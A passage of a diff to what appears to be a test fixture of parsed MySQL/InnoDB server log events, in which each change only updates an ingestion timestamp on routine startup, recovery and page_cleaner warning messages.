time.)", "event": { - "ingested": "2021-06-21T12:35:17.188563191Z", + "ingested": "2021-12-09T13:41:33.114891600Z", "category": [ "database" ], 
@@ -1341,7 +1341,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 773594ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188563646Z", + "ingested": "2021-12-09T13:41:33.114897500Z", "category": [ "database" ], @@ -1362,7 +1362,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1912617ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188564096Z", + "ingested": "2021-12-09T13:41:33.114903800Z", "category": [ "database" ], @@ -1383,7 +1383,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 150375ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188564546Z", + "ingested": "2021-12-09T13:41:33.114909800Z", "category": [ "database" ], @@ -1404,7 +1404,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1030636ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188565005Z", + "ingested": "2021-12-09T13:41:33.114914Z", "category": [ "database" ], @@ -1425,7 +1425,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3596603ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188565582Z", + "ingested": "2021-12-09T13:41:33.114918800Z", "category": [ "database" ], @@ -1446,7 +1446,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 774598ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188566150Z", + "ingested": "2021-12-09T13:41:33.114924Z", "category": [ "database" ], 
@@ -1467,7 +1467,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597787ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188566601Z", + "ingested": "2021-12-09T13:41:33.114929300Z", "category": [ "database" ], @@ -1488,7 +1488,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515462ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188567059Z", + "ingested": "2021-12-09T13:41:33.114933600Z", "category": [ "database" ], @@ -1509,7 +1509,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597628ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188567522Z", + "ingested": "2021-12-09T13:41:33.114937600Z", "category": [ "database" ], @@ -1530,7 +1530,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515609ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188567982Z", + "ingested": "2021-12-09T13:41:33.114941800Z", "category": [ "database" ], @@ -1551,7 +1551,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3598607ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188568657Z", + "ingested": "2021-12-09T13:41:33.114945400Z", "category": [ "database" ], @@ -1572,7 +1572,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515633ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188569174Z", + "ingested": "2021-12-09T13:41:33.114950Z", "category": [ "database" ], 
@@ -1593,7 +1593,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 2282610ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188569629Z", + "ingested": "2021-12-09T13:41:33.114955900Z", "category": [ "database" ], @@ -1614,7 +1614,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515227ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188570096Z", + "ingested": "2021-12-09T13:41:33.114961900Z", "category": [ "database" ], @@ -1635,7 +1635,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3200608ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188570551Z", + "ingested": "2021-12-09T13:41:33.114967800Z", "category": [ "database" ], @@ -1656,7 +1656,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3089523ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188571207Z", + "ingested": "2021-12-09T13:41:33.114976Z", "category": [ "database" ], @@ -1677,7 +1677,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 2180623ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188571820Z", + "ingested": "2021-12-09T13:41:33.114982Z", "category": [ "database" ], @@ -1698,7 +1698,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 176629ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188572273Z", + "ingested": "2021-12-09T13:41:33.114987900Z", "category": [ "database" ], 
@@ -1719,7 +1719,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 516622ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188572732Z", + "ingested": "2021-12-09T13:41:33.114993800Z", "category": [ "database" ], @@ -1740,7 +1740,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3598602ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188573184Z", + "ingested": "2021-12-09T13:41:33.114999700Z", "category": [ "database" ], @@ -1761,7 +1761,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 545611ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188573633Z", + "ingested": "2021-12-09T13:41:33.115005600Z", "category": [ "database" ], @@ -1782,7 +1782,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 2114631ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188574155Z", + "ingested": "2021-12-09T13:41:33.115011600Z", "category": [ "database" ], @@ -1803,7 +1803,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1287614ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188574762Z", + "ingested": "2021-12-09T13:41:33.115017500Z", "category": [ "database" ], @@ -1824,7 +1824,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3595581ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188575225Z", + "ingested": "2021-12-09T13:41:33.115023600Z", "category": [ "database" ], 
@@ -1845,7 +1845,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 773622ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188575682Z", + "ingested": "2021-12-09T13:41:33.115029400Z", "category": [ "database" ], @@ -1866,7 +1866,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1215572ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188576139Z", + "ingested": "2021-12-09T13:41:33.115035200Z", "category": [ "database" ], @@ -1887,7 +1887,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 79642ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188576594Z", + "ingested": "2021-12-09T13:41:33.115041100Z", "category": [ "database" ], @@ -1908,7 +1908,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1803651ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188577051Z", + "ingested": "2021-12-09T13:41:33.115063700Z", "category": [ "database" ], @@ -1929,7 +1929,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3595607ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188577631Z", + "ingested": "2021-12-09T13:41:33.115069100Z", "category": [ "database" ], @@ -1950,7 +1950,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 257596ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188578094Z", + "ingested": "2021-12-09T13:41:33.115072600Z", "category": [ "database" ], 
@@ -1971,7 +1971,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3097591ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188578547Z", + "ingested": "2021-12-09T13:41:33.115077200Z", "category": [ "database" ], @@ -1992,7 +1992,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3331614ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188579007Z", + "ingested": "2021-12-09T13:41:33.115082300Z", "category": [ "database" ], @@ -2013,7 +2013,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 289611ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188579464Z", + "ingested": "2021-12-09T13:41:33.115087200Z", "category": [ "database" ], @@ -2034,7 +2034,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 257653ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188579923Z", + "ingested": "2021-12-09T13:41:33.115091800Z", "category": [ "database" ], @@ -2055,7 +2055,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3598198ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188580532Z", + "ingested": "2021-12-09T13:41:33.115095600Z", "category": [ "database" ], @@ -2076,7 +2076,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515624ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188581053Z", + "ingested": "2021-12-09T13:41:33.115099700Z", "category": [ "database" ], 
@@ -2097,7 +2097,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3598619ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188581504Z", + "ingested": "2021-12-09T13:41:33.115103200Z", "category": [ "database" ], @@ -2118,7 +2118,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515611ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188581958Z", + "ingested": "2021-12-09T13:41:33.115107700Z", "category": [ "database" ], @@ -2139,7 +2139,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 2141603ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188582411Z", + "ingested": "2021-12-09T13:41:33.115113500Z", "category": [ "database" ], @@ -2160,7 +2160,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 172601ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188582869Z", + "ingested": "2021-12-09T13:41:33.115119300Z", "category": [ "database" ], @@ -2181,7 +2181,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 516617ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188583331Z", + "ingested": "2021-12-09T13:41:33.115125100Z", "category": [ "database" ], @@ -2202,7 +2202,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597620ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188583899Z", + "ingested": "2021-12-09T13:41:33.115130900Z", "category": [ "database" ], 
@@ -2223,7 +2223,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515622ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188584360Z", + "ingested": "2021-12-09T13:41:33.115136700Z", "category": [ "database" ], @@ -2244,7 +2244,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3598618ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188584816Z", + "ingested": "2021-12-09T13:41:33.115142500Z", "category": [ "database" ], @@ -2265,7 +2265,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515592ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188585269Z", + "ingested": "2021-12-09T13:41:33.115148200Z", "category": [ "database" ], @@ -2286,7 +2286,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3598651ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188585735Z", + "ingested": "2021-12-09T13:41:33.115154200Z", "category": [ "database" ], @@ -2307,7 +2307,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515588ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188586328Z", + "ingested": "2021-12-09T13:41:33.115160300Z", "category": [ "database" ], @@ -2328,7 +2328,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597614ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188586852Z", + "ingested": "2021-12-09T13:41:33.115166Z", "category": [ "database" ], 
@@ -2349,7 +2349,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 515625ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188587312Z", + "ingested": "2021-12-09T13:41:33.115171800Z", "category": [ "database" ], @@ -2370,7 +2370,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597594ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188587770Z", + "ingested": "2021-12-09T13:41:33.115177500Z", "category": [ "database" ], @@ -2391,7 +2391,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 514629ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188588221Z", + "ingested": "2021-12-09T13:41:33.115183300Z", "category": [ "database" ], @@ -2412,7 +2412,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597613ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188588677Z", + "ingested": "2021-12-09T13:41:33.115189Z", "category": [ "database" ], @@ -2433,7 +2433,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 514596ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188589139Z", + "ingested": "2021-12-09T13:41:33.115194700Z", "category": [ "database" ], @@ -2454,7 +2454,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1460642ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188589593Z", + "ingested": "2021-12-09T13:41:33.115200400Z", "category": [ "database" ], 
@@ -2475,7 +2475,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 773648ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188590060Z", + "ingested": "2021-12-09T13:41:33.115206100Z", "category": [ "database" ], @@ -2496,7 +2496,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597657ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188590513Z", + "ingested": "2021-12-09T13:41:33.115211900Z", "category": [ "database" ], @@ -2517,7 +2517,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 813477ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188590976Z", + "ingested": "2021-12-09T13:41:33.115217Z", "category": [ "database" ], @@ -2538,7 +2538,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 2824646ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188591434Z", + "ingested": "2021-12-09T13:41:33.115220500Z", "category": [ "database" ], @@ -2559,7 +2559,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 592456ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188591896Z", + "ingested": "2021-12-09T13:41:33.115225Z", "category": [ "database" ], @@ -2580,7 +2580,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1309781ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188592405Z", + "ingested": "2021-12-09T13:41:33.115230100Z", "category": [ "database" ], 
@@ -2601,7 +2601,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3596681ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188592905Z", + "ingested": "2021-12-09T13:41:33.115235200Z", "category": [ "database" ], @@ -2622,7 +2622,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 782633ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188593362Z", + "ingested": "2021-12-09T13:41:33.115239400Z", "category": [ "database" ], @@ -2643,7 +2643,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3597668ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188593823Z", + "ingested": "2021-12-09T13:41:33.115243400Z", "category": [ "database" ], @@ -2664,7 +2664,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 514635ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188594284Z", + "ingested": "2021-12-09T13:41:33.115247400Z", "category": [ "database" ], @@ -2685,7 +2685,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1900621ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188594746Z", + "ingested": "2021-12-09T13:41:33.115252Z", "category": [ "database" ], @@ -2706,7 +2706,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 147678ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188595271Z", + "ingested": "2021-12-09T13:41:33.115258Z", "category": [ "database" ], 
@@ -2727,7 +2727,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1029630ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188595874Z", + "ingested": "2021-12-09T13:41:33.115263700Z", "category": [ "database" ], @@ -2748,7 +2748,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3595664ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188596328Z", + "ingested": "2021-12-09T13:41:33.115269400Z", "category": [ "database" ], @@ -2769,7 +2769,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 2831638ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188596782Z", + "ingested": "2021-12-09T13:41:33.115273800Z", "category": [ "database" ], @@ -2790,7 +2790,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 564697ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188597252Z", + "ingested": "2021-12-09T13:41:33.115278500Z", "category": [ "database" ], @@ -2811,7 +2811,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 58662ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188597710Z", + "ingested": "2021-12-09T13:41:33.115284300Z", "category": [ "database" ], @@ -2832,7 +2832,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3595651ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188598161Z", + "ingested": "2021-12-09T13:41:33.115290Z", "category": [ "database" ], 
@@ -2853,7 +2853,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 257645ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188598767Z", + "ingested": "2021-12-09T13:41:33.115294200Z", "category": [ "database" ], @@ -2874,7 +2874,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 2883673ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188599267Z", + "ingested": "2021-12-09T13:41:33.115297600Z", "category": [ "database" ], @@ -2895,7 +2895,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 1060590ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188599726Z", + "ingested": "2021-12-09T13:41:33.115302100Z", "category": [ "database" ], @@ -2916,7 +2916,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3596652ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188600186Z", + "ingested": "2021-12-09T13:41:33.115307800Z", "category": [ "database" ], @@ -2937,7 +2937,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 228658ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188600642Z", + "ingested": "2021-12-09T13:41:33.115313100Z", "category": [ "database" ], @@ -2958,7 +2958,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 257407ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188601103Z", + "ingested": "2021-12-09T13:41:33.115318100Z", "category": [ "database" ], 
@@ -2979,7 +2979,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3598669ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188601642Z", + "ingested": "2021-12-09T13:41:33.115355700Z", "category": [ "database" ], @@ -2994,7 +2994,7 @@ "@timestamp": "2016-12-12T12:40:38.000Z", "message": "mysqld_safe Starting mysqld daemon with databases from /usr/local/var/mysql", "event": { - "ingested": "2021-06-21T12:35:17.188602325Z", + "ingested": "2021-12-09T13:41:33.115359200Z", "category": [ "database" ], @@ -3015,7 +3015,7 @@ }, "message": "TIMESTAMP with implicit DEFAULT value is deprecated. Please use --explicit_defaults_for_timestamp server option (see documentation for more details).", "event": { - "ingested": "2021-06-21T12:35:17.188602803Z", + "ingested": "2021-12-09T13:41:33.115363Z", "category": [ "database" ], @@ -3036,7 +3036,7 @@ }, "message": "'NO_ZERO_DATE', 'NO_ZERO_IN_DATE' and 'ERROR_FOR_DIVISION_BY_ZERO' sql modes should be used with strict mode. They will be merged with strict mode in a future release.", "event": { - "ingested": "2021-06-21T12:35:17.188603268Z", + "ingested": "2021-12-09T13:41:33.115367700Z", "category": [ "database" ], @@ -3057,7 +3057,7 @@ }, "message": "'NO_AUTO_CREATE_USER' sql mode was not set.", "event": { - "ingested": "2021-06-21T12:35:17.188603721Z", + "ingested": "2021-12-09T13:41:33.115373600Z", "category": [ "database" ], @@ -3078,7 +3078,7 @@ }, "message": "Insecure configuration for --secure-file-priv: Current value does not restrict location of generated files. Consider setting it to a valid, non-empty path.", "event": { - "ingested": "2021-06-21T12:35:17.188604178Z", + "ingested": "2021-12-09T13:41:33.115381500Z", "category": [ "database" ], 
@@ -3099,7 +3099,7 @@ }, "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld (mysqld 5.7.10) starting as process 97910 ...", "event": { - "ingested": "2021-06-21T12:35:17.188604635Z", + "ingested": "2021-12-09T13:41:33.115387300Z", "category": [ "database" ], @@ -3120,7 +3120,7 @@ }, "message": "Setting lower_case_table_names=2 because file system for /usr/local/var/mysql/ is case insensitive", "event": { - "ingested": "2021-06-21T12:35:17.188605103Z", + "ingested": "2021-12-09T13:41:33.115390900Z", "category": [ "database" ], @@ -3141,7 +3141,7 @@ }, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:17.188605560Z", + "ingested": "2021-12-09T13:41:33.115395300Z", "category": [ "database" ], @@ -3162,7 +3162,7 @@ }, "message": "InnoDB: Uses event mutexes", "event": { - "ingested": "2021-06-21T12:35:17.188606013Z", + "ingested": "2021-12-09T13:41:33.115401100Z", "category": [ "database" ], @@ -3183,7 +3183,7 @@ }, "message": "InnoDB: GCC builtin __atomic_thread_fence() is used for memory barrier", "event": { - "ingested": "2021-06-21T12:35:17.188606469Z", + "ingested": "2021-12-09T13:41:33.115407Z", "category": [ "database" ], @@ -3204,7 +3204,7 @@ }, "message": "InnoDB: Compressed tables use zlib 1.2.3", "event": { - "ingested": "2021-06-21T12:35:17.188606925Z", + "ingested": "2021-12-09T13:41:33.115412900Z", "category": [ "database" ], @@ -3225,7 +3225,7 @@ }, "message": "InnoDB: Number of pools: 1", "event": { - "ingested": "2021-06-21T12:35:17.188607376Z", + "ingested": "2021-12-09T13:41:33.115417500Z", "category": [ "database" ], @@ -3246,7 +3246,7 @@ }, "message": "InnoDB: Using CPU crc32 instructions", "event": { - "ingested": "2021-06-21T12:35:17.188607831Z", + "ingested": "2021-12-09T13:41:33.115422300Z", "category": [ "database" ], 
@@ -3267,7 +3267,7 @@ }, "message": "InnoDB: Initializing buffer pool, total size = 128M, instances = 1, chunk size = 128M", "event": { - "ingested": "2021-06-21T12:35:17.188608367Z", + "ingested": "2021-12-09T13:41:33.115428200Z", "category": [ "database" ], @@ -3288,7 +3288,7 @@ }, "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:17.188608822Z", + "ingested": "2021-12-09T13:41:33.115434Z", "category": [ "database" ], @@ -3309,7 +3309,7 @@ }, "message": "InnoDB: Highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:17.188609278Z", + "ingested": "2021-12-09T13:41:33.115440100Z", "category": [ "database" ], @@ -3330,7 +3330,7 @@ }, "message": "InnoDB: Log scan progressed past the checkpoint lsn 2498891", "event": { - "ingested": "2021-06-21T12:35:17.188609738Z", + "ingested": "2021-12-09T13:41:33.115444500Z", "category": [ "database" ], @@ -3351,7 +3351,7 @@ }, "message": "InnoDB: Doing recovery: scanned up to log sequence number 2498900", "event": { - "ingested": "2021-06-21T12:35:17.188610189Z", + "ingested": "2021-12-09T13:41:33.115448900Z", "category": [ "database" ], @@ -3372,7 +3372,7 @@ }, "message": "InnoDB: Doing recovery: scanned up to log sequence number 2498900", "event": { - "ingested": "2021-06-21T12:35:17.188612418Z", + "ingested": "2021-12-09T13:41:33.115453200Z", "category": [ "database" ], @@ -3393,7 +3393,7 @@ }, "message": "InnoDB: Database was not shutdown normally!", "event": { - "ingested": "2021-06-21T12:35:17.188612978Z", + "ingested": "2021-12-09T13:41:33.115457700Z", "category": [ "database" ], @@ -3414,7 +3414,7 @@ }, "message": "InnoDB: Starting crash recovery.", "event": { - "ingested": "2021-06-21T12:35:17.188613492Z", + "ingested": "2021-12-09T13:41:33.115480300Z", "category": [ "database" ], 
@@ -3435,7 +3435,7 @@ }, "message": "InnoDB: Removed temporary tablespace data file: \"ibtmp1\"", "event": { - "ingested": "2021-06-21T12:35:17.188614109Z", + "ingested": "2021-12-09T13:41:33.115485500Z", "category": [ "database" ], @@ -3456,7 +3456,7 @@ }, "message": "InnoDB: Creating shared tablespace for temporary tables", "event": { - "ingested": "2021-06-21T12:35:17.188614562Z", + "ingested": "2021-12-09T13:41:33.115490800Z", "category": [ "database" ], @@ -3477,7 +3477,7 @@ }, "message": "InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...", "event": { - "ingested": "2021-06-21T12:35:17.188615028Z", + "ingested": "2021-12-09T13:41:33.115495400Z", "category": [ "database" ], @@ -3498,7 +3498,7 @@ }, "message": "InnoDB: File './ibtmp1' size is now 12 MB.", "event": { - "ingested": "2021-06-21T12:35:17.188615483Z", + "ingested": "2021-12-09T13:41:33.115500300Z", "category": [ "database" ], @@ -3519,7 +3519,7 @@ }, "message": "InnoDB: 96 redo rollback 